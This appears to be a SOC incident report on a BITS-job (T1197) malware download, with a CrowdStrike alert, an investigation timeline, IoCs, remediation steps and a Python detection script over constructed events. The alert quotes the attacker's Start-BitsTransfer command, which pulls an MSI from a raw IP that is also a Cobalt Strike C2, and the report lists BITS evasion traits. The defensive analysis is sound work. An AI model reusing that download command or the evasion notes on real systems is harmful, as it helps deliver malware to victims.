T1197 – BITS Jobs (CrowdStrike Detection)

CrowdStrike Alert Details
Alert ID: CS-BITS-1197-7842
Alert Time: 2024-02-15 14:15:22 EST
Severity: HIGH (82/100)
Source: CrowdStrike Falcon EDR
Rule: “Suspicious BITS Job Creation”
MITRE ATT&CK: T1197 – BITS Jobs

Alert Details:

Detection: BITS job created for downloading payload from suspicious URL

Host: DEV-WS-112 (Development Department)

User: rpatel (Raj Patel, Developer)

Time: 14:10 EST

BITS Job Details:

– Job Name: “WindowsUpdateJob”

– Job ID: {7842-ABCD-1234-EFGH-5678}

– Created By: powershell.exe (PID: 3451)

– Command: Start-BitsTransfer -Source "http://185.143.221[.]89/update.msi" -Destination "C:\ProgramData\Microsoft\Windows\Caches\update.msi" -Priority High -Asynchronous

File Transfer:

– Source URL: http://185.143.221[.]89/update.msi

– Destination: C:\ProgramData\Microsoft\Windows\Caches\update.msi

– File Size: 3.2 MB

– Status: Completed at 14:12 EST

– BITS Job Completed: Yes

Additional Events:

– 14:13 – update.msi executed via msiexec.exe

– 14:13 – msiexec spawned powershell.exe (suspicious)

– 14:14 – Network connection to 185.143.221[.]89:443

Anomaly Detection:

– BITS jobs rarely used by developers

– Job name mimics Windows Update

– Destination folder is unusual (Caches folder)

– File executed immediately after download

– C2 connection after execution

Threat Intelligence:

– URL matches known malware distribution site

– update.msi contains Cobalt Strike beacon

– BITS used to evade network monitoring

SOC Investigation Process

Step                      | Action                    | Tools Used                  | Findings
1. Alert Validation       | Verify CrowdStrike alert  | CrowdStrike Falcon Console  | Confirmed suspicious BITS job creation
2. File Analysis          | Analyze update.msi        | CrowdStrike Sandbox         | MSI contains Cobalt Strike beacon; executes PowerShell
3. Process Investigation  | Examine msiexec activity  | CrowdStrike                 | msiexec spawned PowerShell connecting to C2
4. Immediate Containment  | Isolate host              | CrowdStrike                 | Host quarantined
5. BITS Job Cleanup       | Remove BITS job           | bitsadmin                   | BITS job removed; downloaded file deleted
6. User Interview         | Contact user              | Teams, Phone                | User visited compromised site; downloaded "update"

Jira Incident Report
Ticket: SOC-2024-078
Summary: T1197 – BITS Job Used to Download Malicious Payload
Status: RESOLVED
Resolution: MALICIOUS – Download Blocked After Completion
Priority: P2 – MEDIUM
Labels: T1197, bits-jobs, download-cradle, cobalt-strike, crowdstrike
Components: Endpoint-Security, Malware-Response

INCIDENT ANALYSIS REPORT

1. Initial Context:

Detection Source: CrowdStrike Falcon EDR.
Alert: “Suspicious BITS Job Creation”.
Host: DEV-WS-112 (Development Department, user rpatel).
Time: 2024-02-15 14:15 EST.
Technique: MITRE ATT&CK T1197 – BITS Jobs.

2. Technical Analysis:

Attack Chain:

14:00 – User visits compromised developer forum

14:02 – Forum page runs JavaScript that downloads PowerShell script

14:05 – PowerShell creates BITS job to download update.msi

14:05-14:12 – BITS downloads file in background (evades network monitoring)

14:12 – BITS job completes

14:13 – update.msi executed via msiexec

14:14 – msiexec spawns PowerShell connecting to C2

14:15 – CrowdStrike alerts

BITS Job Details:

Job Name: WindowsUpdateJob (masquerading)
Source: http://185.143.221[.]89/update.msi
Destination: C:\ProgramData\Microsoft\Windows\Caches\update.msi
Priority: High
Transfer Mode: Asynchronous (background)

Malware Analysis:

File: update.msi (SHA256: b2c3d4e5f6…)
Type: MSI package with embedded Cobalt Strike beacon
Behavior: When installed, extracts and executes PowerShell script
C2: 185.143.221[.]89:443

Evasion Technique:

BITS runs as SYSTEM, bypasses user-mode firewalls
Transfers in background, not visible to user
Uses Windows trusted binary (bitsadmin.exe)

3. Investigation Findings:

Timeline:

14:02 – User visits compromised site

14:05 – BITS job created

14:12 – Download completes

14:13 – MSI executes

14:14 – C2 connection

14:15 – Alert triggers

14:16 – Host isolated

Indicators of Compromise (IoCs):

Network:

– Download URL: http://185.143.221[.]89/update.msi

– C2: 185.143.221[.]89:443

BITS:

– Job Name: WindowsUpdateJob

– Job ID: {7842-ABCD-1234-EFGH-5678}

Files:

– C:\ProgramData\Microsoft\Windows\Caches\update.msi (SHA256: b2c3d4e5…)

4. Containment Actions:

Immediate Actions:

Isolated host via CrowdStrike.
Removed BITS job using bitsadmin /cancel.
Deleted update.msi.
Terminated msiexec and PowerShell processes.
Blocked C2 IP at firewall.

Host Remediation:

Full scan (no other malware).
No reimage needed (malware removed).

User Remediation:

User educated on drive-by downloads.
Browser cache cleared.

5. Root Cause Analysis:

Primary Cause: User visited compromised developer forum.
Contributing Factors:
BITS allowed to download from untrusted sources.
No application control blocking unknown MSI files.
User unaware of drive-by risks.

6. Business Impact:

Operational Impact: Developer workstation offline for 2 hours.
Data Exposure: None (C2 blocked after initial connection).

7. Remediation & Prevention:

Completed Actions:

Malware removed.
Host cleaned.
User educated.
IOCs blocked.

Technical Controls Enhanced:

Blocked BITS jobs to/from untrusted domains via GPO.
Enabled logging for all BITS jobs.
Created SIEM alert for BITS jobs with suspicious destination folders.
Deployed browser isolation for developer browsing.
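The anomaly list in the alert (job name mimicking Windows Update, raw-IP source over plain HTTP, unusual ProgramData\Caches destination, job created by PowerShell, file executed right after the download) and the SIEM alert added under "Technical Controls Enhanced" can be expressed as one correlation rule. The following is an added example written for this page, not CrowdStrike's or the SOC's own code. It runs the heuristics over a constructed set of event records whose shape is an assumption, loosely modelled on BITS-Client operational events (job created, transfer complete) and process-creation telemetry; the trusted-host allowlist and the benign vendor job are constructed placeholders. It generalizes slightly beyond the incident by accepting defanged URLs and any scripting host as the job creator.

```python
import re
from datetime import datetime, timedelta
from ipaddress import ip_address
from urllib.parse import urlparse

# Constructed sample telemetry (not real logs). Event shapes are simplified assumptions:
# "bits_job_created" / "bits_transfer_complete" stand in for BITS-Client operational
# events; "process_create" stands in for Sysmon Event ID 1 / EDR process telemetry.
INCIDENT_JOB = "{7842-ABCD-1234-EFGH-5678}"
SAMPLE_EVENTS = [
    {"time": "2024-02-15 09:30:00", "type": "bits_job_created", "job_id": "{benign-0001}",
     "job_name": "VendorToolUpdate", "creator": "vendortool.exe",
     "url": "https://updates.example-vendor.test/tool-2.1.msi",
     "dest": r"C:\Users\rpatel\AppData\Local\Temp\tool-2.1.msi"},
    {"time": "2024-02-15 09:31:00", "type": "bits_transfer_complete", "job_id": "{benign-0001}"},
    {"time": "2024-02-15 14:05:00", "type": "bits_job_created", "job_id": INCIDENT_JOB,
     "job_name": "WindowsUpdateJob", "creator": "powershell.exe",
     "url": "http://185.143.221[.]89/update.msi",  # defanged, as the alert records it
     "dest": r"C:\ProgramData\Microsoft\Windows\Caches\update.msi"},
    {"time": "2024-02-15 14:12:00", "type": "bits_transfer_complete", "job_id": INCIDENT_JOB},
    {"time": "2024-02-15 14:13:00", "type": "process_create",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec.exe /i "C:\ProgramData\Microsoft\Windows\Caches\update.msi"'},
]

TRUSTED_HOSTS = {"updates.example-vendor.test"}  # constructed allowlist; populate from the BITS GPO policy
WINDOWS_UPDATE_NAME = re.compile(r"windows\s*update", re.IGNORECASE)
SUSPICIOUS_DEST = re.compile(r"\\ProgramData\\.*\\Caches\\", re.IGNORECASE)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
EXEC_WINDOW = timedelta(minutes=5)  # "file executed immediately after download"


def parse_time(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S")


def refang(url):
    """Undo the usual defanging so the indicator can be parsed and compared."""
    return url.replace("[.]", ".").replace("hxxp", "http")


def is_ip_host(host):
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def score_job(job, completion_time, process_events):
    """Return the list of anomaly reasons that apply to one BITS job (empty if none)."""
    reasons = []
    parsed = urlparse(refang(job["url"]))
    host = parsed.hostname or ""
    if parsed.scheme == "http":
        reasons.append("cleartext http source")
    if is_ip_host(host):
        reasons.append("source host is a raw IP address")
    if WINDOWS_UPDATE_NAME.search(job["job_name"]) and host not in TRUSTED_HOSTS:
        reasons.append("job name mimics Windows Update but source is not a trusted update host")
    if SUSPICIOUS_DEST.search(job["dest"]):
        reasons.append("destination is an unusual ProgramData Caches folder")
    if job["creator"].lower() in SCRIPT_HOSTS:
        reasons.append(f"job created by scripting host {job['creator']}")
    if completion_time is not None:
        # Correlate: the downloaded file launched shortly after the transfer finished.
        for ev in process_events:
            delta = parse_time(ev["time"]) - completion_time
            if job["dest"].lower() in ev["cmdline"].lower() and timedelta(0) <= delta <= EXEC_WINDOW:
                image = ev["image"].rsplit("\\", 1)[-1]
                minutes = int(delta.total_seconds() // 60)
                reasons.append(f"downloaded file executed {minutes} min after completion by {image}")
                break
    return reasons


def analyze_bits_events(events):
    """Return {job_id: [reasons]} for every BITS job that trips at least one heuristic."""
    jobs = {e["job_id"]: e for e in events if e["type"] == "bits_job_created"}
    completed = {e["job_id"]: parse_time(e["time"]) for e in events if e["type"] == "bits_transfer_complete"}
    procs = [e for e in events if e["type"] == "process_create"]
    findings = {}
    for job_id, job in jobs.items():
        reasons = score_job(job, completed.get(job_id), procs)
        if reasons:
            findings[job_id] = reasons
    return findings


if __name__ == "__main__":
    for job_id, reasons in analyze_bits_events(SAMPLE_EVENTS).items():
        print(job_id)
        for r in reasons:
            print("  -", r)
```

The benign vendor job produces no findings, while the incident job trips all six heuristics; in a SIEM the same logic would run over the BITS-Client operational log once "Enabled logging for all BITS jobs" is in place, with the execution correlation joined against process-creation events.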

8. Conclusion:

Attackers used BITS jobs to download malware in the background, evading network monitoring. The user visited a compromised developer forum, triggering the download. CrowdStrike detected the BITS job and subsequent execution, enabling rapid containment.

Closure Rationale: Malware removed; host cleaned; BITS monitoring enhanced.

Analyst: [Walter White], SOC Analyst
Date: 2024-02-15 15:30 EST
